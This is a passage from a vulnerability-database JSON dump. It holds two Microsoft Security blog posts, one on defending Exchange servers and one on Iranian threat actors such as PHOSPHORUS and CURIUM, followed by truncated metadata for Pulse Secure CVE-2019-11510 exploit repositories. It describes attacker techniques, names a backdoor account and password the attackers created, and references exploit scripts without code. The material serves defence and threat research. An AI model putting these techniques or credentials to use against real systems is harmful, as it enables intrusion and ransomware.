settings.\n\n\n\n## Remote access\n\nThe next step for attackers was to create a network architecture using port forwarding tools like _plink.exe_, a command line connection tool like _ssh_. Using these tools allowed attackers to bypass network restrictions and remotely access machines through Remote Desktop Protocol (RDP). This is a very stealthy technique: attackers reused dumped credentials to access the machines through encrypted tunneling software, eliminating the need to deploy backdoors, which may have a high chance of getting detected.\n\n\n\n## Exfiltration\n\nFinally, dumped data was compressed using the utility tool _rar.exe. _The compressed data mostly comprised of the extracted _.pst_ files, along with memory dumps.\n\n\n\n# Improving defenses against Exchange server compromise\n\nAs these attacks show, Exchange servers are high-value targets. These attacks also tend to be advanced threats with highly evasive, fileless techniques. For example, at every stage in the attack chain above, the attackers abused existing tools (LOLBins) and scripts to accomplish various tasks. Even in cases where non-system binaries were introduced, they were either legitimate and signed, like _plink.exe_, or just a proxy for the malicious binary, for example, the modified Mimikatz where the actual malicious payload never touched the disk.\n\nKeeping these servers safe from these advanced attacks is of utmost importance. Here are steps that organizations can take to ensure they don\u2019t fall victim to Exchange server compromise.\n\n 1. Apply the latest security updates\n\nIdentify and remediate vulnerabilities or misconfigurations in Exchange servers. Deploy the latest security updates, especially for server components like Exchange, as soon as they become available. Specifically, check that the patches for CVE-2020-0688 is in place. Use [threat and vulnerability management](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) to audit these servers regularly for vulnerabilities, misconfigurations, and suspicious activity.\n\n 2. Keep antivirus and other protections enabled\n\nIt\u2019s critical to protect Exchange servers with [antivirus software](<https://docs.microsoft.com/exchange/antispam-and-antimalware/windows-antivirus-software?view=exchserver-2019>) and other security solutions like firewall protection and MFA. [Turn on cloud-delivered protection](<https://docs.microsoft.com/windows/security/threat-protection/windows-defender-antivirus/enable-cloud-protection-windows-defender-antivirus>) and automatic sample submission to use artificial intelligence and machine learning to quickly identify and stop new and unknown threats. Use [attack surface reduction rules](<https://docs.microsoft.com/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard>) to automatically block behaviors like credential theft and suspicious use of PsExec and WMI. Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n\nIf you are worried that these security controls will affect performance or disrupt operations, engage with IT pros to help determine the true impact of these settings. Security teams and IT pros should collaborate on applying mitigations and appropriate [settings](<https://docs.microsoft.com/exchange/antispam-and-antimalware/windows-antivirus-software>).\n\n 3. Review sensitive roles and groups\n\nReview highly privileged groups like Administrators, Remote Desktop Users, and Enterprise Admins. Attackers add accounts to these groups to gain foothold on a server. Regularly review these groups for suspicious additions or removal. To identify Exchange-specific anomalies, review the list of users in sensitive roles such as _mailbox import export_ and _Organization Management_ using the _Get-ManagementRoleAssignment_ cmdlet in Exchange PowerShell.\n\n 4. Restrict access\n\nPractice the principle of least-privilege and maintain credential hygiene. Avoid the use of domain-wide, admin-level service accounts. Enforce [strong randomized, just-in-time local administrator passwords](<https://docs.microsoft.com/windows-server/identity/securing-privileged-access/securing-privileged-access#2-just-in-time-local-admin-passwords>) and Enable MFA. Use tools like [LAPS](<https://technet.microsoft.com/en-us/mt227395.aspx>).\n\nPlace access control list (ACL) restrictions on ECP and other virtual directories in IIS. Don\u2019t expose the ECP directory to the web if it isn\u2019t necessary and to anyone in the company who doesn\u2019t need to access it. Apply similar restrictions to other application pools.\n\n 5. Prioritize alerts\n\nThe distinctive patterns of Exchange server compromise aid in detecting malicious behaviors and inform security operations teams to quickly respond to the initial stages of compromise. Pay attention to and immediately investigate alerts indicating suspicious activities on Exchange servers. Catching attacks in the exploratory phase, the period in which attackers spend several days exploring the environment after gaining access, is key. Common application pools like \u2018_MSExchangeOWAAppPool\u2019_ or _\u2018MSExchangeECPAppPool\u2019 _are commonly hijacked by attackers through web shell deployment. Prioritize alerts related to processes such as _net.exe_, _cmd.exe_, and _mshta.exe_ originating from these pools or _w3wp.exe_ in general.\n\nBehavior-based blocking and containment capabilities in [Microsoft Defender Advanced Threat Protection](<https://www.microsoft.com/WindowsForBusiness/windows-atp>) stop many of the malicious activities we described in this blog. Behavior-based blocking and containment stops advanced attacks in their tracks by detecting and halting malicious processes and behaviors.\n\n \n\n \n\n_Figure 7. Microsoft Defender ATP alerts on blocked behaviors_\n\nIn addition, Microsoft Defender ATP\u2019s endpoint detection and response (EDR) sensors provide visibility into malicious behaviors associated with Exchange server compromise. Behavior-based Exchange-specific alerts include \u201cSuspicious w3wp.exe activity in Exchange\u201d, which indicates that attackers are running arbitrary commands via the IIS processes in an Exchange server.\n\n[](<https://www.microsoft.com/security/blog/wp-content/uploads/2020/06/Suspiciousw3wpexeactivityinExchange.png>)\n\n_Figure 8. Microsoft Defender ATP alert and process tree for suspicious w3wp.exe activity in Exchange_\n\nThese alerts should be immediately prioritized and fully investigated, and any credentials present on the Exchange server, including those used for service accounts and scheduled tasks, should be considered compromised. Beyond resolving these alerts in the shortest possible time, organizations should focus on investigating the end-to-end attack chain and trace the vulnerability, misconfiguration, or other weakness in the infrastructure that allowed the attack to occur.\n\nMicrosoft Defender ATP is a component of the broader [Microsoft Threat Protection](<https://www.microsoft.com/security/technology/threat-protection>) (MTP), which provides comprehensive visibility into advanced attacks by combining the capabilities of Office 365 ATP, Azure ATP, Microsoft Cloud App Security, and Microsoft Defender ATP. Through the [incidents](<https://docs.microsoft.com/microsoft-365/security/mtp/incidents-overview?view=o365-worldwide>) view, MTP provides a consolidated picture of related attack evidence that shows the complete attack story, empowering SecOps teams to thoroughly investigate attacks.\n\nIn addition, MTP\u2019s visibility into malicious artifacts and behavior empowers security operations teams to proactively hunt for threats on Exchange servers. For example, MTP can be connected to Azure Sentinel to enable [web shell threat hunting](<https://techcommunity.microsoft.com/t5/azure-sentinel/web-shell-threat-hunting-with-azure-sentinel-and-microsoft/ba-p/1448065>).\n\nThrough built-in intelligence and automation, Microsoft Threat Protection coordinates protection, detection, and response across endpoints, identity, data, and apps. [Learn more](<https://www.microsoft.com/en-us/security/technology/threat-protection>).\n\n \n\n**_Hardik Suri_**\n\n_Microsoft Defender ATP Research Team_\n\n \n\n### MITRE ATT&amp;CK techniques\n\nInitial access\n\n * [Exploit Public-Facing Application](<https://attack.mitre.org/techniques/T1190/>)\n\nExecution\n\n * [Command-line interface](<https://attack.mitre.org/techniques/T1059/>)\n * [Windows Management Instrumentation](<https://attack.mitre.org/techniques/T1047/>)\n * [PowerShell](<https://attack.mitre.org/techniques/T1086/>)\n\nPersistence\n\n * [Web Shell](<https://attack.mitre.org/techniques/T1100/>)\n * [Create Account](<https://attack.mitre.org/techniques/T1136/>)\n * [New Service](<https://attack.mitre.org/techniques/T1050/>)\n * [Scheduled Task](<https://attack.mitre.org/techniques/T1053/>)\n\nPrivilege escalation\n\n * [Valid Accounts](<https://attack.mitre.org/techniques/T1078/>)\n * [Web Shell](<https://attack.mitre.org/techniques/T1100/>)\n\nDefense evasion\n\n * [Indicator Removal from Tools](<https://attack.mitre.org/techniques/T1066/>)\n * [Obfuscated Files or Information](<https://attack.mitre.org/techniques/T1027/>)\n * [Masquerading](<https://attack.mitre.org/techniques/T1036/>)\n\nCredential access\n\n * [Credential Dumping](<https://attack.mitre.org/techniques/T1003/>)\n\nDiscovery\n\n * [System Network Configuration Discovery](<https://attack.mitre.org/techniques/T1016/>)\n * [Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>)\n * [Account Discovery](<https://attack.mitre.org/techniques/T1087/>)\n * [Permission Groups Discovery](<https://attack.mitre.org/techniques/T1069/>)\n\nLateral movement\n\n * [Windows Admin Shares](<https://attack.mitre.org/techniques/T1077/>)\n * [Pass the Hash](<https://attack.mitre.org/techniques/T1075/>)\n * [Remote File Copy](<https://attack.mitre.org/techniques/T1105/>)\n * [Windows Management Instrumentation](<https://attack.mitre.org/techniques/T1047/>)\n * [New Service](<https://attack.mitre.org/techniques/T1050/>)\n * [Scheduled Task](<https://attack.mitre.org/techniques/T1053/>)\n\nCollection\n\n * [Data From Local System](<https://attack.mitre.org/techniques/T1005/>)\n * [Data Staged](<https://attack.mitre.org/techniques/T1074/>)\n * [Email Collection](<https://attack.mitre.org/techniques/T1114/>)\n\nCommand and control\n\n * [Remote File Copy](<https://attack.mitre.org/techniques/T1105/>)\n * [Connection Proxy](<https://attack.mitre.org/techniques/T1090/>)\n\nExfiltration\n\n * [Data Compressed](<https://attack.mitre.org/techniques/T1002/>)\n * [Exfiltration Over Command and Control Channel](<https://attack.mitre.org/techniques/T1041/>)\n\n \n\nThe post [Defending Exchange servers under attack](<https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-24T16:00:40", "type": "mssecure", "title": "Defending Exchange servers under attack", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2020-06-24T16:00:40", "id": "MSSECURE:748E6D0B920B699D6D088D0AD4422C46", "href": "https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-11-19T19:09:58", "description": "Over the past year, the Microsoft Threat Intelligence Center (MSTIC) has observed a gradual evolution of the tools, techniques, and procedures employed by malicious network operators based in Iran. At [CyberWarCon 2021](<https://www.cyberwarcon.com/>), MSTIC analysts presented their analysis of these trends in Iranian nation state actor activity during a session titled \u201c_The Iranian evolution: Observed changes in Iranian malicious network operations_\u201d. This blog is intended to summarize the content of that research and the topics covered in their presentation and demonstrate MSTIC\u2019s ongoing efforts to track these actors and protect customers from the related threats.\n\nMSTIC consistently tracks threat actor activity, including the groups discussed in this blog, and works across Microsoft Security products and services to build detections into our products that improve customer protections. We are sharing this blog today so that others in the community can also be aware of the latest techniques we have observed being used by Iranian actors.\n\nAs with any observed nation-state actor activity, Microsoft has directly notified customers that have been targeted or compromised, providing them with the information they need to help secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.\n\nThree notable trends in Iranian nation-state operators have emerged:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\n## Ransomware\n\nSince September 2020, MSTIC has observed six Iranian threat groups deploying ransomware to achieve their strategic objectives. These ransomware deployments were launched in waves every six to eight weeks on average.\n\n\n\n_Figure 1: Timeline of ransomware attacks by Iranian threat actors_\n\nIn one observed campaign, PHOSPHORUS targeted the Fortinet FortiOS SSL VPN and unpatched on-premises Exchange Servers globally with the intent of deploying ransomware on vulnerable networks. A recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describes a similar intrusion in which actors leveraged vulnerabilities in on-premise Exchange Servers to compromise a victim environment and encrypt systems via BitLocker. MSTIC also attributes this activity to PHOSPHORUS. PHOSPHORUS operators conducted widespread scanning and ransomed targeted systems through a five-step process: Scan, Exploit, Review, Stage, Ransom.\n\n### Scan\n\nIn the early part of 2021, PHOSPHORUS actors scanned millions of IPs on the internet for Fortinet FortiOS SSL VPN that were vulnerable to [CVE-2018-13379](<https://www.fortiguard.com/psirt/FG-IR-18-384>). This vulnerability allowed the attackers to collect clear-text credentials from the sessions file on vulnerable Fortinet VPN appliances. The actors collected credentials from over 900 Fortinet VPN servers in the United States, Europe, and Israel so far this year. In the last half of 2021, PHOSPHORUS shifted to scanning for unpatched on-premises Exchange Servers vulnerable to ProxyShell ([CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>)).\n\n### Exploit\n\nWhen they identified vulnerable servers, PHOSPHORUS sought to gain persistence on the target systems. In some instances, the actors downloaded a Plink runner named _MicrosoftOutLookUpdater.exe_. This file would beacon periodically to their C2 servers via SSH, allowing the actors to issue further commands. Later, the actors would download a custom implant via a Base64-encoded PowerShell command. This implant established persistence on the victim system by modifying startup registry keys and ultimately functioned as a loader to download additional tools.\n\n### Review\n\nAfter gaining persistence, PHOSPHORUS actors triaged hundreds of victims to determine which of them were fitting for actions on objectives. On select victims, operators created local administrator accounts with a with a username of \u201chelp\u201d and password of \u201c_AS_@1394\u201d via the commands below. On occasion, actors dumped LSASS to acquire credentials to be used later for lateral movement.\n\n\n\n### Stage and Ransom\n\nFinally, MSTIC observed PHOSPHORUS employing BitLocker to encrypt data and ransom victims at several targeted organizations. BitLocker is a full volume encryption feature meant to be used for legitimate purposes. After compromising the initial server (through vulnerable VPN or Exchange Server), the actors moved laterally to a different system on the victim network to gain access to higher value resources. From there, they deployed a script to encrypt the drives on multiple systems. Victims were instructed to reach out to a specific Telegram page to pay for the decryption key.\n\n\n\n## Patience and persistence\n\nMSTIC has observed PHOSPHORUS threat actors employing social engineering to build rapport with their victims before targeting them. These operations likely required significant investment in the operator\u2019s time and resources to refine and execute. This trend indicates PHOSPHORUS is either moving away from or expanding on their past tactics of sending unsolicited links and attachments in spear-phishing email campaigns to attempt credential theft.\n\n### PHOSHORUS \u2013 Patient and persistent\n\nPHOSPHORUS sends \u201cinterview requests\u201d to target individuals through emails that contain tracking links to confirm whether the user has opened the file. Once a response is received from the target user, PHOSPHORUS attackers send a link to a benign list of interview questions hosted on a cloud service provider. The attackers continue with several back-and-forth conversations discussing the questions with the target user before finally sending a meeting invite with a link masquerading as a Google Meeting.\n\nOnce the meeting invite is sent, the attackers continuously reach out to the target user, asking them to test the Google Meeting link. The attackers contact the targeted user multiple times per day, continuously pestering them to click the link. The attackers even go so far as to offer to call the target user to walk them through clicking the link. The attackers are more than willing to troubleshoot any issues the user has signing into the fake Google Meeting link, which leads to a credential harvesting page.\n\nMSTIC has observed PHOSPHORUS operators become very aggressive in their emails after the initial lure is sent, to the point where they are almost demanding a response from the targeted user.\n\n### CURIUM \u2013 In it for the long run\n\nCURIUM is another Iranian threat actor group that has shown a great deal of patience when targeting users. Instead of phishing emails, CURIUM actors leverage a network of fictitious social media accounts to build trust with targets and deliver malware.\n\nThese attackers have followed the following playbook:\n\n * Masquerade as an attractive woman on social media\n * Establish a connection via social media with a target user via LinkedIn, Facebook, etc.\n * Chat with the target daily\n * Send benign videos of the woman to the target to prime them to lower their guard\n * Send malicious files to the target similar the benign files previously sent\n * Request that the target user open the malicious document\n * Exfiltrate data from the victim machine\n\nThe process above can take multiple months from the initial connection to the delivery of the malicious document. The attackers build a relationship with target users over time by having constant and continuous communications which allows them to build trust and confidence with the target. In many of the cases we have observed, the targets genuinely believed that they were making a human connection and not interacting with a threat actor operating from Iran.\n\nBy exercising patience, building relationships, and pestering targets continuously once a relationship has been formed, Iranian threat actors have had more success in compromising their targets.\n\n## Brute force\n\nIn 2021, MSTIC observed DEV-0343 aggressively targeting Office 365 tenants via an ongoing campaign of password spray attacks. DEV-0343 is a threat actor MSTIC assesses to be likely operating in support of Iranian interests. MSTIC has [blogged about DEV-0343 activity previously](<https://www.microsoft.com/security/blog/2021/10/11/iran-linked-dev-0343-targeting-defense-gis-and-maritime-sectors/>).\n\nAnalysis of Office 365 logs suggests that DEV-0343 is using a red team tool like [o365spray](<https://github.com/0xZDH/o365spray>) to conduct these attacks.\n\nTargeting in this DEV-0343 activity has been observed across defense companies that support United States, European Union, and Israeli government partners producing military-grade radars, drone technology, satellite systems, and emergency response communication systems. Further activity has targeted customers in geographic information systems (GIS), spatial analytics, regional ports of entry in the Persian Gulf, and several maritime and cargo transportation companies with a business focus in the Middle East.\n\nAs we discussed in our previous blog, DEV-0343 operators\u2019 \u2018pattern of life\u2019 is consistent with the working schedule of actors based in Iran. DEV-0343 operator activity peaked Sunday through Thursday between 04:00:00 and 16:00:00 UTC.\n\n\n\n_Figure 2: DEV-0343 observed operating hours in UTC_\n\n\n\n_Figure 3: DEV-0343 observed actor requests per day_\n\nKnown DEV-0343 operators have also been observed targeting the same account on the same tenant being targeted by other known Iranian operators. For example, EUROPIUM operators attempted to access a specific account on June 12, 2021 and ultimately gained access to this account on June 13, 2021. DEV-0343 was then observed targeting this same account within minutes of EUROPIUM operators gaining access to it the same day. MSTIC assesses that these observed overlapping activities suggest a coordination between different Iranian actors pursuing common objectives.\n\n## Closing thoughts: Increasingly capable threat actors\n\nAs Iranian operators have adapted both their strategic goals and tradecraft, over time they have evolved into more competent threat actors capable of conducting a full spectrum of operations including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, Iranian operators have proven themselves to be both willing and able to:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n\nMSTIC thanks CyberWarCon 2021 for the opportunity to present this research to the broader security community. Microsoft will continue to monitor all this activity by Iranian actors and implement protections for our customers.\n\n \n\nThe post [Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-16T16:00:08", "type": "mssecure", "title": "Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-11-16T16:00:08", "id": "MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8", "href": "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2021-12-10T14:17:31", "description": "# CVE-2019-11510 PoC\n\nPython script to explo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-08-26T23:30:15", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2021-12-05T21:57:04", "id": "77912E98-768B-5AF5-AE06-1F42C6D88F72", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:30:50", "description": "# pulsexploit\nAutomated script for Pulse Secure SSL VPN exploit ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-12-07T17:09:24", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2021-12-05T21:57:04", "id": "31DB22CD-3492-524F-9D26-035FC1086A71", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:17:45", "description": "Hi this is script to check IP address from shodan that vul...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-08-21T12:03:14", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2020-10-19T12:40:24", "id": "BBEEB41B-D67F-54B6-BA27-1956F83AAAC5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-10T18:30:15", "description": "# pwn-pulse.sh\n**Exploit for Pulse Connect Secure SSL VPN arbitr...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-09-09T15:58:39", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2022-07-10T18:18:14", "id": "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-12T06:25:19", "description": "SUMMARY\n-------\nSimple NSE script to detect Pulse Secure SSL VPN...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-08-27T03:04:19", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2022-07-12T05:49:07", "id": "765DCAD5-2789-5451-BBFA-FAD691719F7A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-22T18:22:40", "description": "# CVE-2019-11510-poc\nPulse Secure SSL VPN pre-auth file reading...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-08-22T08:18:19", "type": "githubexploit", "title": "Exploit for Path Traversal in Pulsesecure Pulse Connect Secure", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2022-06-22T14:31:19", "id": "DC044D23-6D59-5326-AB78-94633F024A74", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:17:27", "description": "# CVE-2019-11510-1\n\n## Exploit for Arbitrary File Read on...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", 